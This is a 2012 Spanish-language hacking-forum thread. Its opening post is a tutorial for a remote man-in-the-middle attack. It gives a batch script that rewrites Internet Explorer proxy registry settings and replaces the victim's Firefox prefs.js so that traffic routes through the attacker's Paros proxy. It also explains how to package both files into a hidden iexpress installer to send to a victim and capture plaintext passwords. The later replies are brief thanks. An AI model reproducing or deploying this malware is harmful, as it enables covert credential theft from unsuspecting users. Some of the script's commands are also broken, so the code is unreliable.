comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Ataque Man in the Middle Remotamente

  • 6 Respuestas
  • 4714 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« en: Junio 22, 2012, 04:53:09 am »
Ataque Man in the Middle Remotamente

Bueno en este tutorial voy a explicar una forma muy facil de realizar un ataque MIM de forma Remota
me decidi a postearlo porq no he leido en ningun foro como realizar esta facil operacion

Necesitaremos 2 cosas

1) Proxy Paros en su ultima version
2) Algun Lenguaje de Programacion
(para hacerlo de forma rapida decidi hacerlo bajo batch aunq se puede desarrollar en otro lenguaje)

Primero q nada Abrimos algun Puerto en Nuetro Modem yo elegi uno alto por ej 9669
Instalamos Proxy Paros, y nos vamos al apartado Tools/Options/Local Proxy
en Adress colocamos el ip de nuestra pc que brindara el servicio de proxy
y en Port el puerto donde correra el Servicio, en este caso 9669
Una ves configurado Paros Proxy nos vamos a programar nuestro malware


Para Lograr editar el proxy atraves de un batch en Firefox, debemos entender q la configuracion de proxys en Firefox se guarda en el archivo prefs.js
Ubicado en C:\Documents and Settings\"USUARIO"\Datos de programa\Mozilla\Firefox\Profiles\0sx27c3l.default\

0sx27c3l.default es un directorio que variara dependiendo de la version y la pc donde se instale Firefox

Sabiendo esto nos toca Crear un prefs.js q contenga la configuracion de Proxy con la IP Publica y puerto de la pc q corre Paros Proxy

Aca el Source del mismo:


# Mozilla User Preferences

/* Do not edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 * For more information, see http://www.mozilla.org/unix/customizing.html#prefs
 */

user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1325582074);
user_pref("app.update.lastUpdateTime.background-update-timer", 1325582074);
user_pref("app.update.lastUpdateTime.blocklist-background-update-timer", 1325582074);
user_pref("app.update.lastUpdateTime.microsummary-generator-update-timer", 1325582074);
user_pref("app.update.lastUpdateTime.search-engine-update-timer", 1325582074);
user_pref("browser.download.manager.alertOnEXEOpen", true);
user_pref("browser.migration.version", 1);
user_pref("browser.places.importDefaults", false);
user_pref("browser.places.migratePostDataAnnotations", false);
user_pref("browser.places.smartBookmarksVersion", 1);
user_pref("browser.places.updateRecentTagsUri", false);
user_pref("browser.preferences.advanced.selectedTabIndex", 1);
user_pref("browser.rights.3.shown", true);
user_pref("browser.search.defaultenginename", "SweetIM Search");
user_pref("browser.search.defaulturl", "");
user_pref("browser.search.selectedEngine", "SweetIM Search");
user_pref("browser.startup.homepage", "http://home.sweetim.com");
user_pref("browser.startup.homepage_override.mstone", "rv:1.9.0.5");
user_pref("extensions.enabledItems", "{e001c731-5e37-4538-a5cb-8168736a2360}:0.9.9.114,ffxtlbr@Facemoods.com:1.4.1,{20a82645-c095-46ed-80e3-08825760534b}:1.0,{EEE6C361-6118-11DC-9C72-001320C79847}:1.2.0.2,{972ce4c6-7e08-4474-a285-3208198ce6fd}:3.0.5");
user_pref("extensions.facemoods.DNSErrUrl", "http://start.facemoods.com/?a=nv1&f=5");
user_pref("extensions.facemoods.aflt", "_#nv1");
user_pref("extensions.facemoods.dfltSrch", false);
user_pref("extensions.facemoods.dnsErr", false);
user_pref("extensions.facemoods.fcmdVrsn", "1.2.7.5.4");
user_pref("extensions.facemoods.firstRun", false);
user_pref("extensions.facemoods.first_time", false);
user_pref("extensions.facemoods.hmpg", false);
user_pref("extensions.facemoods.hmpgUrl", "http://start.facemoods.com/?a=nv1");
user_pref("extensions.facemoods.id", "_#142e8e7b0000000000000800276b6377");
user_pref("extensions.facemoods.instlDay", "_#15321");
user_pref("extensions.facemoods.mntz", "");
user_pref("extensions.facemoods.newTab", false);
user_pref("extensions.facemoods.prtnrId", "_#facemoods.com");
user_pref("extensions.facemoods.searchProviderAdded", false);
user_pref("extensions.facemoods.sid", "_#408714f6355a4f9b85e1b2f01e44ea3e");
user_pref("extensions.facemoods.tlbrSrchUrl", "http://start.facemoods.com/?a=nv1&f=3");
user_pref("extensions.facemoods.update", "_#v1.4.0");
user_pref("extensions.facemoods.vrsn", "_#1.4.17.11");
user_pref("extensions.update.notifyUser", false);
user_pref("general.useragent.extra.microsoftdotnet", "(.NET CLR 3.5.30729)");
user_pref("intl.charsetmenu.browser.cache", "UTF-8");
user_pref("keyword.URL", "http://search.sweetim.com/search.asp?src=2&q=");
user_pref("network.cookie.prefsMigrated", true);
user_pref("network.proxy.backup.ftp", "192.168.0.2");
user_pref("network.proxy.backup.ftp_port", 9669);
user_pref("network.proxy.backup.gopher", "192.168.0.2");
user_pref("network.proxy.backup.gopher_port", 9669);
user_pref("network.proxy.backup.socks", "192.168.0.2");
user_pref("network.proxy.backup.socks_port", 9669);
user_pref("network.proxy.backup.ssl", "192.168.0.2");
user_pref("network.proxy.backup.ssl_port", 9669);
user_pref("network.proxy.ftp", "IPPUBLICA");
user_pref("network.proxy.ftp_port", PUERTO PAROS);
user_pref("network.proxy.gopher", "IPPUBLICA");
user_pref("network.proxy.gopher_port", PUERTO PAROS);
user_pref("network.proxy.http", "IPPUBLICA");
user_pref("network.proxy.http_port", PUERTO PAROS);
user_pref("network.proxy.share_proxy_settings", true);
user_pref("network.proxy.socks", "IPPUBLICA");
user_pref("network.proxy.socks_port", PUERTO PAROS);
user_pref("network.proxy.ssl", "IPPUBLICA");
user_pref("network.proxy.ssl_port", PUERTO PAROS);
user_pref("network.proxy.type", 1);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("sweetim.toolbar.highlight.colors", "#FFFF00,#00FFE4,#5AFF00,#0087FF,#FFCC00,#FF00F0");
user_pref("sweetim.toolbar.logger.ConsoleHandler.MinReportLevel", "7");
user_pref("sweetim.toolbar.logger.FileHandler.FileName", "ff-toolbar.log");
user_pref("sweetim.toolbar.logger.FileHandler.MaxFileSize", "200000");
user_pref("sweetim.toolbar.logger.FileHandler.MinReportLevel", "7");
user_pref("sweetim.toolbar.mode.debug", "false");
user_pref("sweetim.toolbar.previous.browser.search.defaultenginename", "");
user_pref("sweetim.toolbar.previous.browser.search.defaulturl", "");
user_pref("sweetim.toolbar.previous.browser.search.selectedEngine", "");
user_pref("sweetim.toolbar.previous.browser.startup.homepage", "");
user_pref("sweetim.toolbar.previous.keyword.URL", "chrome://browser-region/locale/region.properties");
user_pref("sweetim.toolbar.search.external", "<?xml version=\"1.0\"?><TOOLBAR><EXTERNAL_SEARCH engine=\"http://*google.*\" param=\"q=\" /><EXTERNAL_SEARCH engine=\"http://search.yahoo.com/*\" param=\"p=\" /><EXTERNAL_SEARCH engine=\"http://search.sweetim.*\" param=\"q=\" /><EXTERNAL_SEARCH engine=\"http://*.live.*/*\" param=\"q=\" /><EXTERNAL_SEARCH engine=\"http://*youtube.com/\" param=\"search_query=\" /><EXTERNAL_SEARCH engine=\"http://*.ebay.*/search/*\" param=\"satitle=\" /><EXTERNAL_SEARCH engine=\"http://*.amazon.com/s/*\" param=\"field-keywords=\" /></TOOLBAR>");
user_pref("sweetim.toolbar.search.history.capacity", "10");
user_pref("sweetim.toolbar.searchguard.enable", "true");
user_pref("sweetim.toolbar.simapp_id", "{D1E38357-2567-11E1-A738-0800276B6377}");
user_pref("sweetim.toolbar.urls.homepage", "http://home.sweetim.com");
user_pref("sweetim.toolbar.version", "1.2.0.2");
user_pref("urlclassifier.keyupdatetime.https://sb-ssl.google.com/safebrowsing/newkey", 1342938776);
user_pref("xpinstall.whitelist.add", "");
user_pref("xpinstall.whitelist.add.103", "");

Deben Editar donde dice IPPUBLICA con la Ip del Servidor Paros y donde dice PUERTO PAROS con el Puerto Correspondiente

una ves Creado nuestro prefs.js (desde ahora lo llamaremos prefsh.js) nos vamos a programar nuestro Malware.

Abrimos el Notepad y pegamos lo siguiente (el siguiente Source cambia el Proxy en los Registros de IE)
(Tienen q Sustituir por el Ip del Servidor Proxy Paros donde dice MIIPPUBLICA (ip publica de su pc donde se corre Paros) y donde dice Puerto por el correspondiente Puerto)

@echo off

reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings” /v ProxyServer /t REG_SZ /d ftp=MIIPPUBLICA:Puerto;http=MIIPPUBLICA:Puerto;https=MIIPPUBLICA:Puerto;socks=MIIPPUBLICA:Puerto /f

reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings” /v ProxyEnable /t REG_DWORD /d 0 /f

copy prefsh.js c:\prefsh.js

REM aca sustituimos el prefs.js por nuestro prefsh.js

cd %APPDATA%\Mozilla\Firefox\Profiles\0sx27c3l.default
delete prefs.js
copy c:\prefsh.js %APPDATA%\Mozilla\Firefox\Profiles\prefs.js

exit

Aca tengo una falencia q seguro alguien de Underc0de va a poder aclararme, dado q 0sx27c3l.default es una carpeta creada al momento de instalacion
como podria lograr a traves de batch encontrar el nombre de esa carpeta para luego moverme dentro de ella porq de otra manera el source anterior no funcionaria
en todas las pcs victimas

Pense en moverme primero a %APPDATA%\Mozilla\Firefox\Profiles luego buscar el archivo, con Dir prefs.js /s esto devolveria la hubicacion completa del mismo
y por lo tanto el nombre de esta carpeta default, ahora como puedo utilizar esta ruta o solo sacar el nombre de la carpeta y moverme dentro de ella para lograr
sustituir con exito prefs.js por prefsh.js?

Al finalizar esta parte, tendremos 2 archivos, prefsh.js y el batch y recurriremos a nuestro antiguo amigo iexpress
Crearemos un paquete de ejecucion oculta, meteremos ambos archivos y estableceremos el .bat para la ejecucion post descompresion

Hecho esto tendremos 1 archivo q deberemos mandarcelo a nuesta victima, al ejecutarlo toda informacion q viaje a travez de internet
sera redireccionada a nuestro Proxy y podremos verla en texto sin sifrar.

Como veran en la siguiente fotografia el usuario y password introducidos por la PCVictima se ven reflejados en Paros Proxy en texto Plano



Renuncia: Este contenido es Puramente Educativo, y no me responzabiliso del uso Inadecuado del mismo

No recomiendo para nada esta tecnica, ya q canta muchisimo, al cerrar Proxy Paros se caera la coneccion de la PCVictima y tambien saldran Carteles en los navegadores por falta de certificados, es algo arcaico existiendo los troyanos de hoy en dia, pero es una forma de enteder el sniffing a nivel remoto y una forma distinta a lo comun de lograrlo.

HD_Breaker
« Última modificación: Noviembre 07, 2014, 09:06:56 pm por Expermicid »

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado D3SG4RR4D0R

  • *
  • Underc0der
  • Mensajes: 36
  • Actividad:
    0%
  • Reputación 0
  • Intentando aprender sin perder la cordura
    • Ver Perfil
« Respuesta #1 en: Junio 22, 2012, 05:59:48 am »
Me ha molado buen trabajo sigue asi


Desconectado baron.power

  • *
  • Underc0der
  • Mensajes: 287
  • Actividad:
    5%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Junio 22, 2012, 09:05:36 am »
gracias, interesante tutorial, saludos

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #3 en: Junio 22, 2012, 09:07:32 am »
Muy buen aporte, sinceramente no sabía ni que se podía....
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado Aryenal.Bt

  • *
  • Underc0der
  • Mensajes: 262
  • Actividad:
    0%
  • Reputación 0
  • "El hombre creyéndose sabio se volvió necio"
    • Ver Perfil
    • Email
« Respuesta #4 en: Junio 22, 2012, 07:06:36 pm »
tremendo aporte, la verdad yo tampoco sabia que el ataque Man in the Middle se pudiera realizar en ese rango.
Saludos

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #5 en: Junio 22, 2012, 09:57:23 pm »
Gracias por su apoyo! seguire posteando tutos! abrazo a toda la Familia de Underc0de

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado Comandante Linux

  • *
  • Underc0der
  • Mensajes: 175
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • http://comandante-linux.blogspot.com/
    • Email
« Respuesta #6 en: Junio 23, 2012, 10:05:28 am »
Gracias por compartir se ve interesante.
Un abrazo.




 

¿Te gustó el post? COMPARTILO!



BruteSpray: automatizar el escaneo de puertos y hacer ataque por fuerza bruta

Iniciado por Gabriela

Respuestas: 5
Vistas: 2428
Último mensaje Noviembre 07, 2018, 10:43:38 pm
por redondord
[CURSO] Tecnicas basicas y avanzadas de ataque y defensa Hacking

Iniciado por graphixx

Respuestas: 0
Vistas: 2778
Último mensaje Febrero 09, 2016, 04:50:39 am
por graphixx
[CONFERENCIA][VIDEO DESCARGA] Ataque a servidores web y seguridad en redes

Iniciado por graphixx

Respuestas: 0
Vistas: 1800
Último mensaje Marzo 12, 2016, 01:42:59 am
por graphixx
[vide0]Xss+Set+Msf+Java applet infection+Ataque remoto

Iniciado por ju4nz123

Respuestas: 2
Vistas: 1872
Último mensaje Mayo 22, 2011, 04:57:16 pm
por ju4nz123
[outlook] Vector de Ataque Web mediante ingeniería social

Iniciado por hielasangre

Respuestas: 3
Vistas: 2375
Último mensaje Febrero 11, 2014, 02:31:34 am
por Alvares97